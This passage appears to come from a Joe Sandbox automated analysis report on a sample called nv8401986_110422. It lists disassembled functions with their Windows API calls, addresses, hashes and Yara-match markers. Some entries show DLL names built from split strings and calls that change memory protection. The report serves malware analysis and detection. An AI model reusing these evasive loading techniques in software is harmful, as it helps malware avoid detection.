                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: +bH
                                                                                                                                                                                                          • API String ID: 916978925-3835015316
                                                                                                                                                                                                          • Opcode ID: 575ac6e47312d7d60619535353d645e1a5b02cba07ea9d827ff3e3f384706f11
                                                                                                                                                                                                          • Instruction ID: 0cca4ead0e6ea6a440e6237e246306b027ed8b2c37d93d01c6d358624936cf3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 575ac6e47312d7d60619535353d645e1a5b02cba07ea9d827ff3e3f384706f11
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF31E3B1D04208DFDB00DF58D90A79EBBF0FB16B24F15436AE811A7391EB716A089B95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000,?,?,?,?,?,?,000000FF), ref: 004822FC
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,000000FF), ref: 00482314
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000000FF), ref: 00482322
                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(00000028), ref: 00482333
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000000FF), ref: 004823A4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle$CodeCriticalDeleteExitObjectSectionSingleThreadWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738947277-0
                                                                                                                                                                                                          • Opcode ID: 16a27bef36c3ba62ba695cd804531c77dd142ba971d52ad26475b38dbc73e17f
                                                                                                                                                                                                          • Instruction ID: 779a24adda17da7d69651057d122a5d630690dcffa00759ba924d4571b4758df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16a27bef36c3ba62ba695cd804531c77dd142ba971d52ad26475b38dbc73e17f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2231A0705007059FEB20DF64DA587AFBBF8FB05715F104A2DE85297780DBB9AA08CB54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059699C), ref: 004906F6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059699C), ref: 0049072F
                                                                                                                                                                                                          • 74A5E3D0.COMCTL32(0041B390,00000000,?,?,?,?,?,00000000,00543F35,000000FF,?,0041AE4C), ref: 00490737
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059699C), ref: 004907AA
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004907BF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1517317770-0
                                                                                                                                                                                                          • Opcode ID: 241b30e65a021626b0382ea85a6c70b8a47595e29c6c836debbe46eb745d4db7
                                                                                                                                                                                                          • Instruction ID: 90fa9c0c4f31fb1ff98b4c1f4cab6027ce4007c811b0ac067db5f816bbeff7b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 241b30e65a021626b0382ea85a6c70b8a47595e29c6c836debbe46eb745d4db7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93313970A403109FDF206F749C16B6A3E94BB54F50F05043BE80597391EBB97D489BDA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473CB2
                                                                                                                                                                                                          • allocator.LIBCONCRTD ref: 00473CBF
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473CE3
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473D03
                                                                                                                                                                                                          • construct.LIBCPMTD ref: 00473D23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWorkallocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 516655193-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,00000000,?,00800BF0), ref: 004823F6
                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,?), ref: 0048240F
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00482427
                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00800BF0), ref: 00482455
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,?,?,?,00800BF0), ref: 00482479
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ObjectSingleThreadWait$CodeEventExitResetResume
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1519825774-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004969AB
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004969BC
                                                                                                                                                                                                          • SetPropW.USER32(?,SYSPLUGIN,00000000), ref: 00496B17
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DeleteObject$Prop
                                                                                                                                                                                                          • String ID: SYSPLUGIN
                                                                                                                                                                                                          • API String ID: 2430622332-1574318955
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0044A7DD
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 0044A7E4
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Event$Create
                                                                                                                                                                                                          • String ID: ?p$pngquery
                                                                                                                                                                                                          • API String ID: 1287507382-4246078739
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNEL32(?,?,Function_00124FBA,00000000,00000000,?), ref: 005251E3
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00482443,00000000,00000000,00482E30), ref: 005251EF
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005251F6
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                          • String ID: 0.H
                                                                                                                                                                                                          • API String ID: 2744730728-2821389324
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlw,00000000), ref: 0046D807
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: api.$dll$shlw
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(6C656873,00000000), ref: 0046D46D
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: dll$l32.$shel
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(686E6977,00000000), ref: 0046DE9D
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: dll$ttp.$winh
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(75746573,0082A280), ref: 0046D320
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: .dll$papi$setu
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004F3190: GetModuleHandleA.KERNEL32(kernel32,75920E50,00000002,004D80FF), ref: 004F319E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 004DC68D
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0046F5CB
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread
APIs
• GetFileAttributesA.KERNEL32(?,00000000,00000000,?,004233AC,?,?,?,?,?,@1_360.exe), ref: 00485F08
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,00000000,?,004233AC,?,?,?), ref: 00485F37
• ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,@1_360.exe), ref: 00485FC6
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,@1_360.exe), ref: 00485FF5
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
• API ID: File$AttributesCloseCreateHandleRead
• String ID:
• API String ID: 2880068760-0
APIs
• RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
  • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
• __Init_thread_footer.LIBCMT ref: 0045536E
  • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
  • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
• RtlEnterCriticalSection.NTDLL ref: 00455389
• RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
  • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
  • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
• API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
• String ID:
• API String ID: 916978925-0
APIs
• RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
  • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
• __Init_thread_footer.LIBCMT ref: 004080DA
  • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
  • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
• RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
• RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
  • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
  • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
• API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
• String ID:
• API String ID: 916978925-0
APIs
• RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
  • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
• __Init_thread_footer.LIBCMT ref: 0040820A
  • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
  • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
• RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
• RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
  • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
  • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
• API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
• String ID:
• API String ID: 916978925-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059806C), ref: 00467B0E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00467B2A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059806C), ref: 00467B45
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059806C), ref: 00467B99
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,Function_00124F3B,00000000,00000004,00000000), ref: 0052515A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00525166
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0052516D
                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 0052518B
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue), ref: 00532DB5
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue,00569DE8,FlsSetValue,00000000,00000364,?,005347D5), ref: 00532DC1
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue,00569DE8,FlsSetValue,00000000), ref: 00532DCF
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004035B0: std::locale::_Init.LIBCPMT ref: 00403619
                                                                                                                                                                                                          • std::locale::_Init.LIBCPMT ref: 00408FF1
                                                                                                                                                                                                            • Part of subcall function 00403470: __CxxThrowException@8.LIBVCRUNTIME ref: 0040349D
                                                                                                                                                                                                            • Part of subcall function 00403470: __CxxThrowException@8.LIBVCRUNTIME ref: 004034E2
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::_Lockit.LIBCPMT ref: 0040D10C
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::_Lockit.LIBCPMT ref: 0040D12E
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D156
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D2A1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Lockitstd::_$Exception@8InitLockit::_Lockit::~_Throwstd::locale::_
                                                                                                                                                                                                          • String ID: )@$1@
                                                                                                                                                                                                          • API String ID: 3818760586-2840543281
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(004906C4,?,00000104,75920E50,0041B390,005733F8), ref: 0049F6C6
                                                                                                                                                                                                          • LoadTypeLib.OLEAUT32(?,?), ref: 0049F6E4
                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0049F838
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFreeLoadModuleNameStringType
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4083945026-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F), ref: 00405AB4
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00740053,00000000,00000001,?,00000104), ref: 00405B35
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00405B41
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 004718D9
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$Affinity::operator!=CollectionCollection::~_Concurrency::details::Concurrency::details::_Hardwarestd::locale::facet::facet
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1231514646-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0051230A,?,00531F35,0051230A,0058C980,0000000C), ref: 0053206D
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00531F35,0051230A,0058C980,0000000C), ref: 00532077
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005320A2
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,0046F4FE,?,00000000), ref: 0046EE70
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00010000,00000020,?,00000000,?,?,?,0046F4FE,?,00000000), ref: 0046EE90
                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00010000,?,?,?,0046F4FE,?,00000000), ref: 0046EE99
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3733156554-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00597AA4,000000FF,00000000), ref: 0048D970
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00597AA4,00000001), ref: 0048D994
                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,0048EAE9,?,EFE0703F,00000000,00000000), ref: 0048D9B3
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$CompareSwitchThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2506754736-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534787: GetLastError.KERNEL32(?,?,?,0051EAA1,005349B8,?,00534731,00000001,00000364,?,00524F60,0058C738,00000010), ref: 0053478C
                                                                                                                                                                                                            • Part of subcall function 00534787: _free.LIBCMT ref: 005347C1
                                                                                                                                                                                                            • Part of subcall function 00534787: SetLastError.KERNEL32(00000000), ref: 005347F5
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(?,?,?,0052522C,?,?,00524F9A,00000000), ref: 00525080
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,0052522C,?,?,00524F9A,00000000), ref: 005250A8
                                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0052522C,?,?,00524F9A,00000000), ref: 005250BE
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibraryUser_free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1765993807-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 004761AB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • A valid JSON document must be either an array or an object value., xrefs: 00476266
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
